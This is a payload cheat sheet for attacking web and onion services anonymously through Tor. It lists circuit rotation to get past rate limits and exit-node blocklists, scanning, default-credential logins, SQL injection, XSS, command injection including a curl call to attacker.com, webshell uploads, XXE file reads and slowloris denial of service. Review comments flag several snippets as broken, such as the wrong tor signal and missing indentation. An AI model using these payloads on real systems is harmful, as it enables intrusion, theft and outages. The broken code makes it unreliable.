# Tor-Based Attack Payloads
# ============================================
# 1. TOR CONNECTION SETUP
# ============================================
# Tor SOCKS proxy configuration
SOCKS_PROXY=socks5h://127.0.0.1:9050
HTTP_PROXY=http://127.0.0.1:8118 # Polipo/Privoxy
# Test Tor connection
curl --socks5-hostname 127.0.0.1:9050 https://check.torproject.org/
curl --socks5-hostname 127.0.0.1:9050 https://icanhazip.com
# ============================================
# 2. TOR EXIT NODE LIST CHECKING
# ============================================
# Get Tor exit node list
curl https://check.torproject.org/torbulkexitlist
# Check if IP is Tor exit node
curl "https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=TARGET_IP"
# DNS-based Tor exit node check
# Query: REVERSED_IP_TO_CHECK.PORT.REVERSED_TARGET_IP.ip-port.exitlist.torproject.org (the example below checks 127.0.0.1 against port 80 on 192.168.0.1)
# Example: dig 1.0.0.127.80.1.0.168.192.ip-port.exitlist.torproject.org
# ============================================
# 3. RATE LIMITING BYPASS
# ============================================
# Rotate Tor circuits for new IP
# Using stem library
# controller.signal(Signal.NEWNYM)
# Automated requests with circuit rotation
# Request 1-10 with IP A
# Rotate circuit (get new IP)
# Request 11-20 with IP B
# Continue...
# Testing rate limits
for i in {1..100}; do
# Fixed target and proxy; curl's output and exit status are discarded, so the
# loop records nothing about which of the 100 requests were throttled.
curl --socks5-hostname 127.0.0.1:9050 https://example.com/api/endpoint
# Rotate every 10 requests
# NOTE(review): SIGHUP asks tor to reload its configuration; it is not the
# control-port NEWNYM signal named in the comment above, so a changed exit IP
# is not guaranteed by this step. From the service side every request still
# arrives from a Tor exit, so per-IP limits alone do not cover this pattern
# (see the exit-list checks in section 2 for a more robust signal).
if [ $((i % 10)) -eq 0 ]; then
killall -HUP tor
sleep 5
fi
done
# ============================================
# 4. ONION SERVICE ENUMERATION
# ============================================
# Common onion service patterns
http://*.onion
http://*.onion/admin
http://*.onion/login
http://*.onion/panel
http://*.onion/api
# Known onion services for testing (16-character names are legacy v2 addresses, which current Tor releases no longer resolve; v3 addresses are 56 characters)
http://3g2upl4pq6kufc4m.onion (DuckDuckGo)
http://thehiddenwiki.onion
http://darknetlive.onion
# Subdirectory enumeration
/admin
/panel
/dashboard
/api
/login
/register
/upload
/download
/files
# ============================================
# 5. ONION SERVICE SCANNING
# ============================================
# Port scanning through Tor
proxychains nmap -sT -Pn -p 80,443,8080 example.onion
# Service detection
proxychains nmap -sV -p 80 example.onion
# Directory bruteforce
gobuster dir --proxy socks5://127.0.0.1:9050 -u http://example.onion -w wordlist.txt
# Nikto scan
proxychains nikto -h http://example.onion
# ============================================
# 6. TOR BROWSER FINGERPRINTING EVASION
# ============================================
# Tor Browser User-Agent strings
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
# Standard Tor Browser headers
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
# ============================================
# 7. HIDDEN SERVICE AUTHENTICATION TESTING
# ============================================
# Test default credentials on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/login -d "username=admin&password=admin"
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/login -d "username=admin&password=password"
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/login -d "username=administrator&password=administrator"
# Authentication bypass attempts
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/admin
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/admin -H "Authorization: Bearer null"
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/admin -H "Cookie: admin=true"
# ============================================
# 8. SSRF TO INTERNAL ONION SERVICES
# ============================================
# SSRF payloads targeting onion services
url=http://internal.onion
url=http://admin.onion
url=http://localhost.onion
url=http://192.168.1.1.onion
# Testing internal onion service access
{"webhook_url": "http://internal.onion/api"}
{"callback": "http://admin-panel.onion"}
# ============================================
# 9. SQL INJECTION ON ONION SERVICES
# ============================================
# Test SQLi through Tor
curl --socks5-hostname 127.0.0.1:9050 "http://example.onion/page?id=1' OR '1'='1"
curl --socks5-hostname 127.0.0.1:9050 "http://example.onion/search?q=test' UNION SELECT NULL--"
# Automated SQLi testing
sqlmap -u "http://example.onion/page?id=1" --tor --tor-type=SOCKS5 --check-tor
# ============================================
# 10. XSS ON ONION SERVICES
# ============================================
# XSS payloads for onion services
<script>alert(document.domain)</script>
<img src=x onerror=alert(document.cookie)>
<svg/onload=alert(1)>
# Reflected XSS testing
curl --socks5-hostname 127.0.0.1:9050 "http://example.onion/search?q=<script>alert(1)</script>"
# ============================================
# 11. COMMAND INJECTION ON ONION SERVICES
# ============================================
# Command injection payloads
; whoami
| ls -la
` cat /etc/passwd`
$(curl attacker.com)
# Testing command injection
curl --socks5-hostname 127.0.0.1:9050 "http://example.onion/ping?host=127.0.0.1; whoami"
# ============================================
# 12. FILE UPLOAD ON ONION SERVICES
# ============================================
# Upload malicious files through Tor
curl --socks5-hostname 127.0.0.1:9050 -F "file=@shell.php" http://example.onion/upload
curl --socks5-hostname 127.0.0.1:9050 -F "file=@backdoor.jsp" http://example.onion/upload
# ============================================
# 13. TOR CIRCUIT MANIPULATION
# ============================================
# Request specific exit nodes
# In torrc:
ExitNodes {US}
StrictNodes 1
# Avoid specific exit nodes
ExcludeExitNodes {CN},{RU}
# Use specific entry guards
EntryNodes $fingerprint1,$fingerprint2
# ============================================
# 14. TIMING ATTACKS THROUGH TOR
# ============================================
# Measure response times for timing attacks
for i in {1..100}; do
# -w '%{time_total}' prints the wall-clock duration of the whole transfer in
# seconds; -s silences progress output and -o /dev/null drops the body, so only
# the timing lands in TIME. The figure spans the entire Tor circuit round-trip,
# so any server-side timing difference is likely dominated by circuit latency.
TIME=$(curl --socks5-hostname 127.0.0.1:9050 -w "%{time_total}" -o /dev/null -s "http://example.onion/login?user=admin")
echo "Request $i: $TIME seconds"
done
# ============================================
# 15. ONION SERVICE DOS
# ============================================
# Stress testing onion service
ab -X 127.0.0.1:8118 -n 10000 -c 100 http://example.onion/
# Slowloris through Tor
slowloris --proxy 127.0.0.1:9050 example.onion
# ============================================
# 16. EXIT NODE DETECTION BYPASS
# ============================================
# Rotate circuits to bypass blacklists
# After each blocked request, get new circuit
killall -HUP tor
sleep 5
# Retry request
# Use bridges to hide Tor usage
# In torrc:
UseBridges 1
Bridge obfs4 IP:PORT FINGERPRINT
# ============================================
# 17. ONION SERVICE DISCOVERY
# ============================================
# Search for onion services
# Ahmia.fi search API
curl "https://ahmia.fi/search/?q=keyword"
# Dark web search engines
# notEvil: http://hss3uro2hsxfogfq.onion
# Torch: http://xmh57jrzrnw6insl.onion
# ============================================
# 18. HIDDEN SERVICE DESCRIPTOR ATTACKS
# ============================================
# Query hidden service descriptor
# HSDir servers store descriptors
# Descriptor ID calculated from onion address
# Monitor descriptor uploads
# Timing analysis on descriptor publication
# ============================================
# 19. TOR BROWSER EXPLOIT TESTING
# ============================================
# JavaScript exploits targeting Tor Browser
<script>
// Attempt to detect Tor Browser
// NOTE(review): this condition is true for every Firefox build, not only Tor
// Browser, and the branch body is empty, so nothing is done with the result.
if (navigator.userAgent.includes('Firefox')) {
// Tor Browser specific behavior
}
// Canvas fingerprinting (blocked in Tor Browser)
// The canvas element is created but never drawn on or read back, so this
// snippet does not produce a fingerprint; the comment below describes
// behaviour that no visible code exercises.
var canvas = document.createElement('canvas');
// Will return generic fingerprint in Tor Browser
</script>
# ============================================
# 20. ONION SERVICE API TESTING
# ============================================
# API endpoint enumeration
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/v1/
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/v2/
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/users
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/admin
# GraphQL on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{__schema{types{name}}}"}'
# ============================================
# 21. TOR BRIDGE ENUMERATION
# ============================================
# Request bridges from BridgeDB
curl https://bridges.torproject.org/
# Test bridge connectivity
# In torrc:
UseBridges 1
Bridge obfs4 BRIDGE_IP:PORT FINGERPRINT cert=CERT iat-mode=0
# ============================================
# 22. ONION SERVICE CORS MISCONFIGURATION
# ============================================
# Test CORS on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api \
-H "Origin: http://attacker.onion"
# CORS response headers to inspect: the Origin sent above being reflected back (or a wildcard) together with Allow-Credentials: true indicates a misconfiguration
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
# ============================================
# 23. WEBSOCKET ON ONION SERVICES
# ============================================
# WebSocket connections through Tor
wscat --proxy socks5://127.0.0.1:9050 -c ws://example.onion/ws
# Test WebSocket security
{"type":"auth","token":"' OR '1'='1"}
# ============================================
# 24. ONION SERVICE IDOR
# ============================================
# Test IDOR on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/user/1
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/user/2
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/user/999
# ============================================
# 25. TOR CONSENSUS MANIPULATION
# ============================================
# Download Tor consensus
curl https://collector.torproject.org/recent/relay-descriptors/consensuses/
# Analyze relay information
# Identify potential malicious relays
# ============================================
# 26. ONION SERVICE JWT ATTACKS
# ============================================
# Test JWT on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api \
-H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiJ9."
# JWT weak secret
# Brute force JWT secret on onion service
# ============================================
# 27. ONION SERVICE XXE
# ============================================
# XXE payload for onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
# ============================================
# 28. ONION SERVICE SSRF
# ============================================
# SSRF payloads targeting internal onion services
{"url": "http://internal.onion"}
{"url": "http://127.0.0.1:9050"}
{"url": "http://localhost"}
# ============================================
# 29. TOR DIRECTORY AUTHORITY MONITORING
# ============================================
# Monitor directory authorities
# 9 directory authorities in Tor network
# moria1, tor26, dizum, gabelmoo, maatuska, longclaw, bastet, faravahar, Serge
# Query directory authority
curl http://128.31.0.34:9131/tor/status-vote/current/consensus
# ============================================
# 30. ONION SERVICE SECURITY HEADERS
# ============================================
# Check security headers on onion services
curl --socks5-hostname 127.0.0.1:9050 -I http://example.onion
# Security headers to check for in the response (commonly absent on onion services):
# Strict-Transport-Security (only meaningful when the service is served over HTTPS; the request above is plain http)
# X-Content-Type-Options
# X-Frame-Options
# Content-Security-Policy
# ============================================
# PYTHON TOR AUTOMATION EXAMPLES
# ============================================
# Python with Tor SOCKS proxy
import requests
# socks5h: the proxy (tor) resolves the hostname. .onion names require this;
# with plain socks5 the client would attempt local DNS resolution instead.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
response = requests.get('http://example.onion', proxies=proxies)
# Python with Stem (Tor controller)
from stem import Signal
from stem.control import Controller
# Needs the control port (9051) enabled in torrc. authenticate() with no
# arguments presumably reads the cookie file or password from the default
# locations — confirm against the local tor configuration.
# NOTE(review): the two statements below belong inside the `with` block and
# are missing their indentation as pasted here.
with Controller.from_port(port=9051) as controller:
controller.authenticate()
controller.signal(Signal.NEWNYM) # New identity
# ============================================
# BASH TOR AUTOMATION EXAMPLES
# ============================================
# Rotate Tor identity
killall -HUP tor
# Check current Tor IP
curl --socks5-hostname 127.0.0.1:9050 https://icanhazip.com
# Automated onion service scanner
#!/bin/bash
# Target list; each entry is used below as a bare hostname.
ONIONS=("example1.onion" "example2.onion" "example3.onion")
for onion in "${ONIONS[@]}"; do
echo "Scanning $onion"
# NOTE(review): $onion is unquoted in both commands (ShellCheck SC2086);
# harmless for these literal names, but word-splitting and globbing would
# apply if the list ever held spaces or wildcards. Both tools write to the
# terminal only; nothing is saved for later review.
proxychains nmap -sT -Pn -p 80,443 $onion
proxychains nikto -h http://$onion
done
# ============================================
# TOR CIRCUIT INFORMATION
# ============================================
# Get current circuit info
# Using Tor control port (9051)
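# Query the local control port for the current circuit list.
# An empty AUTHENTICATE presumably only succeeds when the control port is
# configured without cookie or password authentication — a local test setup;
# check torrc before relying on it. printf replaces the non-portable `echo -e`,
# and every control-protocol line, including QUIT, is CRLF-terminated so the
# daemon processes all three commands rather than waiting on an unterminated
# final line.
printf '%s\r\n' 'AUTHENTICATE ""' 'GETINFO circuit-status' 'QUIT' | nc 127.0.0.1 9051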
# Monitor circuit creation
# Using stem library to get real-time circuit events